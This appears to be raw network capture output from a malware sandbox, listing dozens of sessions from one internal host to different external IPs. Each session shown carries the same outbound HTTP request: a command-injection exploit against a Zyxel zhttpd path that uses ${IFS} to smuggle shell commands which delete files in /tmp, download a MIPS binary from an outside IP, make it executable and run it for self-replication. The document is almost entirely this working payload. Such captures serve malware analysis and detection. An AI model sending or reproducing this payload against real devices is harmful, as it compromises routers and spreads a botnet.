                                            Jan 14, 2024 15:50:56.780644894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9066192.168.2.2344220172.133.241.77443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.780673981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9067192.168.2.2351872144.36.138.34443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.780709982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9068192.168.2.2348332158.82.180.21443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.780751944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9069192.168.2.234394018.169.230.58443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.780818939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9070192.168.2.233743227.36.49.5443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.780822039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9071192.168.2.2349266110.122.51.71443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.780878067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9072192.168.2.2340744146.56.205.178443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.780921936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9073192.168.2.2340730213.178.251.2443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.780988932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9074192.168.2.2347402164.107.101.229443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.781030893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9075192.168.2.234889245.138.206.152443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.781085014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9076192.168.2.2333690113.138.110.186443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.781132936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9077192.168.2.2356686152.152.46.169443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.781177044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9078192.168.2.2350616185.16.196.137443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.781220913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9079192.168.2.2347436120.84.17.254443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.781271935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9080192.168.2.233409865.240.132.158443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.781303883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9081192.168.2.234602824.144.136.240443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.781336069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9082192.168.2.2344634126.65.253.236443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.781366110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9083192.168.2.2351428123.26.233.30443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.781414986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9084192.168.2.2342776143.117.45.72443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.781465054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9085192.168.2.2345232101.5.57.107443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.781496048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9086192.168.2.2333716223.111.163.154443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.781549931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9087192.168.2.2335126165.151.109.90443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.781593084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9088192.168.2.2352176184.6.212.109443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.781656027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9089192.168.2.235652845.93.225.233443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.781682968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9090192.168.2.2346918178.224.63.105443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.781739950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9091192.168.2.235981460.158.122.170443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.793775082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9092192.168.2.2352556211.141.43.175443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.793796062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9093192.168.2.2360176194.248.232.132443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.793850899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9094192.168.2.235928085.110.104.85443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.793911934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9095192.168.2.234376019.15.110.20443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.793931007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9096192.168.2.234972653.81.128.85443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.793982983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9097192.168.2.2349774171.108.169.123443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.794048071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9098192.168.2.2341030111.68.190.22443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.794074059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9099192.168.2.2360356211.88.199.129443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.794154882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9100192.168.2.235214460.19.63.223443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.794204950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9101192.168.2.2355816211.177.254.33443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.794250011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9102192.168.2.2351016217.27.160.246443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.794286013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9103192.168.2.2337072220.161.44.247443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.794307947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9104192.168.2.2342858167.183.173.178443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.794348001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9105192.168.2.235991024.98.77.218443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.794389009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9106192.168.2.2336868124.38.177.29443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.794440031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9107192.168.2.2336554136.143.36.39443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.794464111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9108192.168.2.236062823.87.1.70443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.794504881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9109192.168.2.233913076.99.24.228443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.794567108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9110192.168.2.2339140139.72.71.242443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.794615030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9111192.168.2.235428652.13.9.226443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.794641018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9112192.168.2.235434645.53.114.160443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.794682026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9113192.168.2.2343366222.222.224.253443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.794732094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9114192.168.2.2338922124.177.146.100443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.794748068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9115192.168.2.233571873.160.226.1443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.794821024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9116192.168.2.2333222167.197.156.244443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.794872999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9117192.168.2.234148487.104.241.99443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.794925928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9118192.168.2.2341404119.89.163.51443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.794980049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9119192.168.2.2343480210.100.131.21443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.795021057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9120192.168.2.2353824149.36.155.11443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.802376032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9121192.168.2.2359216159.75.89.146443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.802401066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9122192.168.2.236092617.116.28.89443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.802457094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9123192.168.2.2340588180.149.31.146443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.802524090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9124192.168.2.234800464.1.226.67443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.802555084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9125192.168.2.2341192200.93.58.72443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.802623034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9126192.168.2.233904844.5.195.194443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.802648067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9127192.168.2.2355370131.216.185.166443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.802715063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9128192.168.2.2342586186.143.165.78443
                                            TimestampBytes transferredDirectionData
